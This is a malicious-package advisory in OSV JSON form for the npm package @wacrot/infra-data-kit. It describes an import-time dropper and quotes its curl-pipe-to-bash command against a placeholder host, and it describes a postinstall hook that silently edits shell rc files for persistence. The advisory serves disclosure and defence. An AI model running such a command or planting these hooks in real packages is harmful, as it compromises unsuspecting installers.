{"id":"MAL-2026-5834","summary":"Malicious code in @wacrot/infra-data-kit (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (1568dfa61d19a63f6837c4a8c9b5d728401d0f34c87ce3550af594c141a94ac1)\nOn any `require()` or `import` of @wacrot/infra-data-kit, src/index.js invokes addSupport() at module top level, which spawns a detached `bash -c 'curl -fsSL https://example.com/script.sh | bash'` via node:child_process with stdio ignored and errors swallowed by empty catch blocks. This is a textbook fetch-and-execute dropper embedded in a package advertised as a GeoJSON / data utility, and it fires automatically on import with no user consent or verification. Separately, package.json declares a postinstall hook (`npx no-install @wacrot/infra-data-kit npm run scripts/setup.js`) which executes scripts/setup.js at install time. setup.js locates the first of ~/.zshrc, ~/.bashrc, ~/.profile, makes a .bak copy, and inserts a new line into the file. The current inserted line is benign (`export MY_CUSTOM_VAR='test'`), but the primitive is silent, persistent modification of the installer's shell rc files on every install — the standard mechanism for attacker persistence via PATH/alias/source hooks. The atypical postinstall invocation through `npx no-install` further obscures lifecycle inspection.
The destination URL `https://example.com/script.sh` is a placeholder; the mechanism is fully wired and any future republish or DNS pivot delivers attacker-controlled shell code to every installer.\n","modified":"2026-06-15T21:46:53.748829439Z","published":"2026-06-15T20:55:15Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-06-15T20:55:22Z","sha256":"1568dfa61d19a63f6837c4a8c9b5d728401d0f34c87ce3550af594c141a94ac1","import_time":"2026-06-15T21:33:35.207481775Z","source":"amazon-inspector","id":"IN-MAL-2026-006715","versions":["2.1.0"]},{"versions":["2.0.6"],"import_time":"2026-06-15T21:33:35.316809388Z","sha256":"9b786922d30a4bf2895ccc72832e755017c2a6086b60a41546477353cad7a002","id":"IN-MAL-2026-006716","source":"amazon-inspector","modified_time":"2026-06-15T20:55:23Z"},{"versions":["2.1.4"],"sha256":"ed3dbc1e873b9aeef4db7a0118d43e32ef55ba4f0bdbe60601f26dfb9f9465df","import_time":"2026-06-15T21:33:34.807092723Z","source":"amazon-inspector","id":"IN-MAL-2026-006711","modified_time":"2026-06-15T20:55:15Z"},{"versions":["2.0.9"],"import_time":"2026-06-15T21:33:35.480808304Z","sha256":"2fae648a1c4f2f52a58e92d0877909d0c257de08ac85648b26c05cfaeed735c4","id":"IN-MAL-2026-006718","source":"amazon-inspector","modified_time":"2026-06-15T20:55:25Z"},{"modified_time":"2026-06-15T20:55:20Z","sha256":"48b21f9afd4984fc6e40d4d6d9d22118936bbbda62480fceb51e2a1e05d7f2fe","import_time":"2026-06-15T21:33:35.017855228Z","source":"amazon-inspector","id":"IN-MAL-2026-006713","versions":["2.0.8"]},{"versions":["2.0.7"],"sha256":"5a287471a6a92d725824819ebe06e1f705cbce4f1a67443be50872c034e4eb6e","import_time":"2026-06-15T21:33:35.394317825Z","id":"IN-MAL-2026-006717","source":"amazon-inspector","modified_time":"2026-06-15T20:55:23Z"},{"versions":["2.1.1"],"sha256":"6dffaaac09416f6badd0af76a7fd930025004f4d7eed785c4cb8d275a55287cc","import_time":"2026-06-15T21:33:35.116906903Z","id":"IN-MAL-2026-006714","source":"amazon-inspector","modified_time":"2026-06-15T20:55:21Z
"},{"modified_time":"2026-06-15T20:55:20Z","sha256":"7ef0c37effa4d55594ab9723da3aa953b0a6826726083f7ae264d913389e36ed","import_time":"2026-06-15T21:33:34.909205154Z","source":"amazon-inspector","id":"IN-MAL-2026-006712","versions":["2.1.2"]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@wacrot/infra-data-kit/v/2.1.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@wacrot/infra-data-kit/v/2.0.6"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@wacrot/infra-data-kit/v/2.1.4"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@wacrot/infra-data-kit/v/2.0.9"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@wacrot/infra-data-kit/v/2.0.8"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@wacrot/infra-data-kit/v/2.0.7"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@wacrot/infra-data-kit/v/2.1.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@wacrot/infra-data-kit/v/2.1.2"}],"affected":[{"package":{"name":"@wacrot/infra-data-kit","ecosystem":"npm","purl":"pkg:npm/%40wacrot%2Finfra-data-kit"},"versions":["2.1.0","2.0.6","2.1.4","2.0.9","2.0.8","2.0.7","2.1.1","2.1.2"],"database_specific":{"indicators":{"evidence_files":[{"path":"src/index.js","sha256":"60a944d3f7a425ddd9b05ddf51d5d55cac6109402378680018cd5e2fb696ee50","tlsh":"ec22fc0e74fa6110c25b31b611abd0daba34c853250c9d51b99d87e06fd4abc9af7b8c"},{"path":"scripts/setup.js","sha256":"1bf9d290d4dcfae9500aca1025b84c41c779865830c0455aa84c06ad96f33ac6","tlsh":"263183678afd5f7705220952b34f20353c21e3923510f69099a8694d4fc4ad8c6c3aed"},{"path":"package.json","sha256":"feebb916f42e8438ea43ae30057cc0219bfd8e26a249bbcde85734dd0d231a46","tlsh":"94017b26ee309d2345d865521da92203a761a8870b88fc1937c7402c8f4e77f21fe76e"}],"package_integrity":[{"filename":"infra-data-kit-2.1.0.tgz","hashes":{"sha1":"4188fe2d34ce05ed66bd83483f73de3c86a8a8a0","sha512_sri":"sha512-XpeWsnqqKxb4Jxvfw11PuN92GKvEtjZSGpdnuUiQIAjO93pGQd+mGz6wuXjC8sifpmPzPxhmPrTb4jj4LL7WKw=="}}]},"cwes":[
{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@wacrot/infra-data-kit/MAL-2026-5834.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}